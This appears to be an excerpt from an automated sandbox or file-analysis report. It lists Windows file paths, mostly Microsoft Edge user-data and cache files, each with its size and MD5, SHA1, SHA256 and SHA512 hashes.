MD5d7c9c6d2e1d9ae242d68a8316f41198c
SHA18d2ddccc88a10468e5bffad1bd377be82d053357
SHA256f215127185b2ee6b01e12b6ca75d3e5c4e454598dd4aed36124ae13d59afd547
SHA5127fd14824e9200dd99e1fd2cee402656dc0cfc3d0a60058c5eb05c68e9e65b7f0b47e550fb4d6c2b59eba204dbf3ef9e69dc9723b43a9b3ccd5412d6b77715fc3
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.57\LICENSE
Filesize24KB
MD5aad9405766b20014ab3beb08b99536de
SHA1486a379bdfeecdc99ed3f4617f35ae65babe9d47
SHA256ed0f972d56566a96fb2f128a7b58091dfbf32dc365b975bc9318c9701677f44d
SHA512bd9bf257306fdaff3f1e3e1fccb1f0d6a3181d436035124bd4953679d1af2cd5b4cc053b0e2ef17745ae44ae919cd8fd9663fbc0cd9ed36607e9b2472c206852
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\TrustTokenKeyCommitments\2025.1.17.1\keys.json
Filesize6KB
MD5bef4f9f856321c6dccb47a61f605e823
SHA18e60af5b17ed70db0505d7e1647a8bc9f7612939
SHA256fd1847df25032c4eef34e045ba0333f9bd3cb38c14344f1c01b48f61f0cfd5c5
SHA512bdec3e243a6f39bfea4130c85b162ea00a4974c6057cd06a05348ac54517201bbf595fcc7c22a4ab2c16212c6009f58df7445c40c82722ab4fa1c8d49d39755c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Typosquatting\2025.4.4.1\typosquatting_list.pb
Filesize631KB
MD5b8c6ba92a7c00d0606eea674e4290f4c
SHA1fe8e88d81be193b7600c0183e336d608660d7a37
SHA256e140881a869def268461cbadf52f0987f2e5d80f92d454972701942b01fd6270
SHA512dc62e349122e7061ebadc18733c2ca0d48005635f1bfbf89d85dd4f52aa4d67255575603c8c25d18545c7ba65001e32a44ddde2fb75338c3c5baa15579d2877f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\component_crx_cache\cllppcmmlnkggcmljjfigkcigaajjmid_1.16F664A597E81D6F26EC242652C591134DBD9344ACD56963F342798484D95F41
Filesize4.2MB
MD5bca127b3f9dcdc11d19bbbb7d9487c0c
SHA1c902ee726df95a7804931ec8717f5378b705ee45
SHA25616f664a597e81d6f26ec242652c591134dbd9344acd56963f342798484d95f41
SHA512d1dafb2adbe2b4e4ff4f5a8945085c725b9acc29674784c78bb9f872ff6c977d88e354021901ea40e99bf5cdc98f373c77dfa38ed4ec65c7a5072d899f7aa2eb
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\component_crx_cache\eeobbhfgfagbclfofmgbdfoicabjdbkn_1.A99D66CFCE8CA170740CE0403956F4DFAF4683829A89F4B7AD9C95303871E284
Filesize1KB
MD51e347bce035a3b1d37598a2384055e53
SHA1b600b703c20ca9e93191494b97d87cf77182265d
SHA256a99d66cfce8ca170740ce0403956f4dfaf4683829a89f4b7ad9c95303871e284
SHA512d2d4dd7b434e0187c9ce46f5b3a43910a63b96bdb19b569d6ad570e5e67382a983d304df0827cd21b888c1522d9ecd1fc2cacf1acf45266f1c058bea031e7a80
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\component_crx_cache\fgbafbciocncjfbbonhocjaohoknlaco_1.DA1220F5F273289FE6F557EA15FCF05B6B7EB90EE53A8124A608FA4B1308463E
Filesize7KB
MD5c6b8f4941e6d3c264fd755630ad06584
SHA1f622bbc4fcc0bfcabdf3965b9b80a89f927169f5
SHA256da1220f5f273289fe6f557ea15fcf05b6b7eb90ee53a8124a608fa4b1308463e
SHA512bf1ac0bdbfb4e6707c3d9d2148f1b329588e95a2f11164a92e4f71443d56b6b46f6b11f1fed7880c10ba03ecfba433ebbdc4bbf301407a95fe626f0d71ad14ce
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\component_crx_cache\jcmcegpcehdchljeldgmmfbgcpnmgedo_1.6A12DF0C2ACFBCEDF59EE15EA7D598D13B1FF5C3F2472C12DA9576B8E9DB2FF8
Filesize173KB
MD5189e4c1bcd096b07e942480240a0f9a1
SHA162818c0ff480878903d573999d1eae16de4eb936
SHA2566a12df0c2acfbcedf59ee15ea7d598d13b1ff5c3f2472c12da9576b8e9db2ff8
SHA5123669a7d4775f558fbd2ee5467cce624cc045f5e6ef51a5f9b6aa7192c6ff597afa89263b7d2331b722f8248ced92450e8aa29a35a767947f1079e71a6803105b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\component_crx_cache\kpfehajjjbbcifeehjgfgnabifknmdad_1.00AF3F07B5ABB71F6D30337E1EEF62FA280F06EF19485C0CF6B72171F92CCC0A
Filesize1.0MB
MD514ef2d35ee97e8be10d6046b2e1942de
SHA18ad139e47d4d58df369e40c025923be0d82a5f9b
SHA25600af3f07b5abb71f6d30337e1eef62fa280f06ef19485c0cf6b72171f92ccc0a
SHA512f6e646031caa27f972b222a94aee3b2b610db686009e1dee6fbf0c4ac7ba6edb632eafd9ed81e15bb011e2c31ed4dda82b16dac560ed68596159ec29064ecda3
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\component_crx_cache\lfmeghnikdkbonehgjihjebgioakijgn_1.26741A0BFB39D1C8E862C0B332847906C13278DDEA51BF82AA73ACBA5D786557
Filesize17KB
MD511e26ccc59b09429290398e5193ed9ee
SHA14762254760264aff68ea4aecaa793bd498c3c360
SHA25626741a0bfb39d1c8e862c0b332847906c13278ddea51bf82aa73acba5d786557
SHA5126c9aef2da5a155c57ed6b253b31c5e90dac86c3b9163447fd19a3cc753389f0b5edbd0f80cc533c887b244ab5ad6ceed24ddcf20a57fb3e417ec517c8118e8b8
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\component_crx_cache\lkkdlcloifjinapabfonaibjijloebfb_1.18019BEB1D2B6F91D1849CE2ABC6B9BD83FFAB505BB252125F79A4ECEDFAC75A
Filesize82KB
MD5bd9ce4f5bc69e2803c9de1a5a70ad044
SHA1f3494cde4179c089a2fa9ec0ba010767ab5d2ed7
SHA25618019beb1d2b6f91d1849ce2abc6b9bd83ffab505bb252125f79a4ecedfac75a
SHA5125bc3152b6efaba8c0811b420e3544c4f2296cad4a4fafced47205e483bbb84455d44b8d64f565d0744f4686ce1e0f85efc0bbb323cbd97256de9930260460671
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\component_crx_cache\llmidpclgepbgbgoecnhcmgfhmfplfao_1.A12FA065D8029C8C693E965944F90EC33777C13AB1ACC1CFE831159CA1689EDE
Filesize2.8MB
MD5de9e36da21e16f89ba47681cca2aac4a
SHA1a81025141f4636ed48a01153c2471bcaee3bc1b7
SHA256a12fa065d8029c8c693e965944f90ec33777c13ab1acc1cfe831159ca1689ede
SHA51293f370a8049a2f8dd9f7e8151b00a8db251af0b1956a56133e1563d6360c613ce349468d2e252b8b67dfd5c5c73b975f8590a24d9d87661213e731cf448d40f9
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\component_crx_cache\mpicjakjneaggahlnmbojhjpnileolnb_1.F1E989294536240B298829DAC157C775F8616205E771BBCF0D69CE3474D24458
Filesize66KB
MD53fae92c0c6bf12f9485c01e737b17800
SHA139486f8fbb92c5dce7be5b3a1a7002e3b562ae5d
SHA256f1e989294536240b298829dac157c775f8616205e771bbcf0d69ce3474d24458
SHA512f21c556bdcfc78f8a23a9c657d774f7b9d3d2e1d7fde9179ed1eee2620fd7f4f058c3f96ffb65c051f41ddc8effb826126015303c731ba0ed9daf4842ea34bcf
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\component_crx_cache\ndikpojcjlepofdkaaldkinkjbeeebkl_1.69D0D51AD8D1AABAAE811B5BC6F72729BEEBE8AB40C8E6080C8255453F913377
Filesize1.6MB
MD54e1b8110c0051df94a611086b3afce68
SHA176d1fda433efdfde03006189e9727c270e4a6936
SHA25669d0d51ad8d1aabaae811b5bc6f72729beebe8ab40c8e6080c8255453f913377
SHA51267112ab375f836e12af54062540d60737683e331d07fecb2f4e830ee005ac093169dccd1bf12f60e5ad5c52cca869950ae5f0ba5b01c007c47599329e0bd6842
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\component_crx_cache\ojblfafjmiikbkepnnolpgbbhejhlcim_1.74CB8B03BCEB8B1A18E409F69977801D1488A02631DE7DF6B41D99335549BB81
Filesize14.0MB
MD5473a6a0d206f7834903e52b16b43bd45
SHA1c2313b0f7e6a434912d8201443d2ccde2dcdfa37
SHA25674cb8b03bceb8b1a18e409f69977801d1488a02631de7df6b41d99335549bb81
SHA512165f9841ae276180c067b41a42e8ef99cbe86fcf8bea6683184a773fbfceba633f1be5c51748d1a9bbc6d3f62798015a11f5076b7a8477574cd71ab6b1b9a8f0
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\component_crx_cache\pdfjdcjjjegpclfiilihfkmdfndkneei_1.A3A37C49F6DEFB87760822D31C3F90D9D77D2E9C84D372A45E4E88878CC046DA
Filesize6KB
MD5635be48f979966a8f10efbdaefa09637
SHA1dc0595977e0348c24a1e5d82db5eee90440cd0cc
SHA256a3a37c49f6defb87760822d31c3f90d9d77d2e9c84d372a45e4e88878cc046da
SHA512938f32cbaa0c00e72242795cbf5947385bc2c5225b67a6833844d9134a8bf0fc72b6ac8c7bf3734fa4f675702f3282c602b842d78d9a131976e611926ba4c2c1
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\extensions_crx_cache\ghbmnnjooekpmoecnnnilnnbdlolhkhi_1.fa2232917a5656ea4f811936561ea6b7c92b3c0004c5e08ecb97636d3afc6f72
Filesize152KB
MD5dd9bf8448d3ddcfd067967f01e8bf6d7
SHA1d7829475b2bd6a3baa8fabfaf39af57c6439b35e
SHA256fa2232917a5656ea4f811936561ea6b7c92b3c0004c5e08ecb97636d3afc6f72
SHA51265347df34378c2bbb34417e2cccfb3251a0b2412422cc190eed9df525b6e0a9948e0295ea3c33b3ad873ce81e369e89a138ac41d6eb7229546c3269107e661de
-
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
Filesize2KB
MD551a8ae9cd30a15f84f5e3b86ad7ec834
SHA14f87348692213e955fc11d58ed41b9dbf4dbce7d
SHA256eb78b79623d20b56f5a89e5a615a2d5f6674f8d390b11413f5d0c80cb7a83d07
SHA51247b337ff9620302230092583eae427ec8cbeec3ae1d7be80dfe79ce4c955c397df008f1bc5d14287ee735dd6610e00199ae42ce8a96dd5c32d77ed838a650ca9
-
Filesize
1KB
MD559583cecd69c4401d92a7a17a16f194b
SHA16134e6c5ec66c755f1537dd984c66b293a207a46
SHA256b3804330d219ae8b7ab3c7b36329b611f8e2c69e90fc86d77760b18d8428f6a6
SHA512084a905d9543be8af45126ff5bd40db819f7cddee9db7618eb42c1229145b944ebd8c61696ac7ec617bd0e55152931bf964b6af01018e9bfce964b4e16121e32
-
Filesize
64B
MD52f56593c4c7976dc20c4b9c40a9bc20c
SHA1a0ad8441e69651f819c93e1459a774c346bc66d1
SHA2561f3711df6686fdabe769d41fda005dbbad865ce09d26715c00bc3bc385ad99e4
SHA5122610b3a3dd6e45d59d5b25a5cf96b77ec84bf5f1abc119f5e0c91714a3b8b2644e285bb0dbc53b27e3ee1164aba432592d0f3a3c3e26e76025e0abc17e63b8d1
-
Filesize
944B
MD5719fd150e78f630817910e72ad00fc16
SHA1093ef625bd5e314e334cffda49458cde7b8a85aa
SHA25617850f8bbb06ed6af4ba88f2c085dd1f3afa20f36f63dc20ad548c1ce61a9455
SHA512cd8b52ddf31313f77f905b2203e55ec32e65cf2f47c828d3262b9fe2ec3cc2704d112ba3574be8967b704cb0c1fbc986665b40ab85b1ad129e5bc98354c8e175
-
Filesize
944B
MD5dbb22d95851b93abf2afe8fb96a8e544
SHA1920ec5fdb323537bcf78f7e29a4fc274e657f7a4
SHA256e1ee9af6b9e3bfd41b7d2c980580bb7427883f1169ed3df4be11293ce7895465
SHA51216031134458bf312509044a3028be46034c544163c4ca956aee74d2075fbeb5873754d2254dc1d0b573ce1a644336ac4c8bd7147aba100bfdac8c504900ef3fc
-
Filesize
944B
MD510890cda4b6eab618e926c4118ab0647
SHA11e1d63b73a0e6c7575f458b3c7917a9ce5ba776d
SHA25600f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14
SHA512a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221
-
Filesize
1KB
MD5e0938b5152919b72f532371a7b36aa5c
SHA12d0c9a14ce15ca56644748c88b4b271b803648fd
SHA2565fea813d3264505e96c6282ee6ea2fbb51eea6bf4f8650d080547cbc80e22903
SHA512392ce91db8eaf6d17ec1152b76f988c4147c3ca9f6a80e0b3925460b4b2bf721ed4f10cccb432dc303548d124a10b50d851acdcb171c1796b51a441cdbbb8d96
-
Filesize
1KB
MD53df110e480ee96b0eb33e2a49b6e9c38
SHA1ab63f7e1cae2e3c353480cf9649ed003f297f02c
SHA2566e681c03c4803b75a721a4439acf24c12b774dea7c652f6feffe57466e3d056c
SHA51237287132e7a1cf3ee34d12db777fe1c067f79bc82dda78a9bca31880fa1937a9230d309b7dd04a541c33c8523063c038ef943673bffd36d3e276cc157383fcee
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82